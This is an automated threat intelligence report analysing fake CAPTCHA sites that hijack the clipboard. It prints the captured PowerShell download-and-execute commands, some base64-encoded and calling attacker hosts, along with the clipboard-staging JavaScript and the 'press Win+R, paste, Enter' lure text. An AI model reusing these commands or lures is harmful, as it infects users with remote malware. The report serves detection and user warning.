Threat Intelligence Report

๐Ÿ“… September 25, 2025 ๐Ÿ•’ Generated: 2025-09-25 02:17:26 ๐Ÿ” Sites Analyzed: 11
๐ŸŒ
11
Total Sites Analyzed
โš ๏ธ
3
Malicious Sites
27.0% detection rate
๐Ÿ’ป
8
PowerShell Commands
๐Ÿ“‹
10
Clipboard Hijacks
๐Ÿ“Š
96
Avg Threat Score

Attack Pattern Analysis

6
High Risk Commands
4
Base64 Encoded
1
Obfuscated JS
6
Inline JS Redirects
0
External JS Chains
0
Redirect Follows
PowerShellCommands 8
EncodedPowerShell 0
ClipboardManipulation 8
ObfuscatedJavaScript 1
Base64Strings 4
JavaScriptRedirects 6
JavaScriptRedirectChains 0
RedirectFollows 0
CaptchaElements 11

Top Indicators/Keywords

CAPTCHA Verification (2) I am not a robot (2) Robot (2) robot (2) Verification (2) verification (2) verification-id (2) verification_id (2) To better prove you are not a robot (2) iex (2)

Malicious Sites Detected

Click on a site to view detailed analysis
https://www.bratusferramentas.grupomoltz.com.br/
41 indicators detected
Score: 351 PowerShell Clipboard Hijacking
3
powershell
5
clipboard
7
captcha
3
base64
3
high risk commands

๐Ÿ’ป PowerShell Commands 3

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)
iwr

๐Ÿ” Suspicious Keywords 13

CAPTCHA Verification
Verification ID
I am not a robot
robot
Robot
Verification
verification
verification-id
verification_id
Verify You Are Human

๐ŸŒ Extracted URLs 2

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

๐Ÿ“‹ Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...
https://blessdayservices.org/up/
40 indicators detected
Score: 309 PowerShell Clipboard Hijacking
3
powershell
5
clipboard
1
downloads
4
captcha
2
high risk commands

๐Ÿ’ป PowerShell Commands 3

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr

๐Ÿ” Suspicious Keywords 13

CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot

๐ŸŒ Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

๐Ÿ“‹ Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance) 

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
https://171.22.16.134/
27 indicators detected
Score: 290 PowerShell
2
powershell
1
obfuscation
1
base64
1
high risk commands

๐Ÿ’ป PowerShell Commands 2

documentElement.innerHTML
powershell -win mini -enc YwB1AHIAbAAuAGUAeABlACAAaAB0AHQAcAA6AC8ALwAxADcAMQAuADIAMgAuADEANgAuADEAMwA0AC8AYgBvAG8AawB2AGkAdABhAC4AdAB4AHQAIAB8ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuAA==");

๐Ÿ” Obfuscated JavaScript

Showing first 1 of 1 entries (truncated for performance) 

{'script': '\r\nif (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini|Mobile|Tablet/i.test(navigator.userAgent) || window.innerWidth < 768) {\r\nwindow.s...', 'indicators': [{'pattern': 'var\\s+_0x[a-f0-9]{4,6}\\s*=', 'examples': ['var _0x2BA3=', 'var _0x8820='], 'count': 3}, {'pattern': '_0x[a-f0-9]{4,6}\\[.*?\\]', 'examples': ['_0x2BA3[_idx]'], 'count': 1}, {'pattern': 'var\\s+_0x[a-f0-9]{2,8}\\s*=', 'examples': ['var _0x2BA3=', 'var _0x8820='], 'count': 3}], 'score': 7, 'position': 100}

Technical Analysis

ClickGrab Threat Analysis Report - 2025-09-25

Generated on 2025-09-25 02:17:26

Executive Summary

  • Total sites analyzed: 11
  • Sites with malicious content: 3
  • Unique domains encountered: 7
  • Total URLs extracted: 22
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 8

Domain Analysis

Most Frequently Encountered Domains

  • godprox.cc: 6 occurrences
  • www.webgo.de: 5 occurrences
  • www.google.com: 4 occurrences
  • t.me: 3 occurrences
  • use.fontawesome.com: 2 occurrences
  • irp.cdn-website.com: 1 occurrences
  • www.1c-bitrix.ru: 1 occurrences

URL Pattern Analysis

reCAPTCHA imagery

2 occurrences across 1 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)

Font resources

2 occurrences across 1 distinct URLs

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (2 times)

CDN hosted scripts

1 occurrences across 1 distinct URLs

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

4 occurrences across 3 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/intl/en/policies/privacy/ (1 times)
  • https://www.google.com/intl/en/policies/terms/ (1 times)

Suspicious Keyword Analysis

Total Keywords Found: 26 (15 unique)

Keyword Categories

Social Engineering

12 unique keywords

  • Robot
  • verification
  • robot
  • To better prove you are not a robot
  • verification-id
  • Verification ID
  • Verification Hash
  • I am not a robot
  • CAPTCHA Verification
  • verification_id
  • ...and 2 more

Verification Text

2 unique keywords

  • hidden
  • Hidden

Technical Terms

1 unique keywords

  • iex

Most Frequent Keywords

  • CAPTCHA Verification: 2 occurrences
  • I am not a robot: 2 occurrences
  • Robot: 2 occurrences
  • robot: 2 occurrences
  • Verification: 2 occurrences
  • verification: 2 occurrences
  • verification-id: 2 occurrences
  • verification_id: 2 occurrences
  • To better prove you are not a robot: 2 occurrences
  • iex: 2 occurrences
  • hidden: 2 occurrences
  • Verification Hash: 1 occurrences
  • Hidden: 1 occurrences
  • Verification ID: 1 occurrences
  • Verify You Are Human: 1 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id, Verification ID

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • com/recaptcha/about/images/reCAPTCHA

Clipboard Manipulation Analysis

Detected clipboard manipulation in 8 instances.

Document.Execcommand Copy

Found in 6 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 6 snippets (75.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected Total Technique Instances: 27

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 2 Examples: createElement("textarea"

Content Injection

Injecting malicious content into elements

Instances: 3 Examples: .value =, .textContent =

DOM Manipulation

Adding elements to the DOM

Instances: 6 Examples: append(, body.append

Selection Methods

Selecting content for copying

Instances: 6 Examples: .select()

Clipboard Operations

Executing clipboard copy operations

Instances: 6 Examples: execCommand("copy"

Cleanup Operations

Removing temporary elements

Instances: 4 Examples: removeChild

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 1 Examples: - commandToRun +

Verification Text

Instances: 1 Examples: - "copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
รขยœ "I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...
Perform the steps above to finish verification.

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
รขยœ "I am not a robot - reCAPTCHA Verification ID: 146820"

<footer class="verify-container veri...
Perform the steps above to finish verification.
Verify You Are Human

Verify You Are Human

I'`

Hash Generation

Instances: 1 Examples: - verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขยœ ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
รขยœ "I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...
Perform the steps above to finish verification.

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
รขยœ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id`

Comment Injection

Instances: 2 Examples: - # " const ploy = "

Attack Pattern Reconstruction

Malicious Download Sources

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

  1. Prevalence: 27.3% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments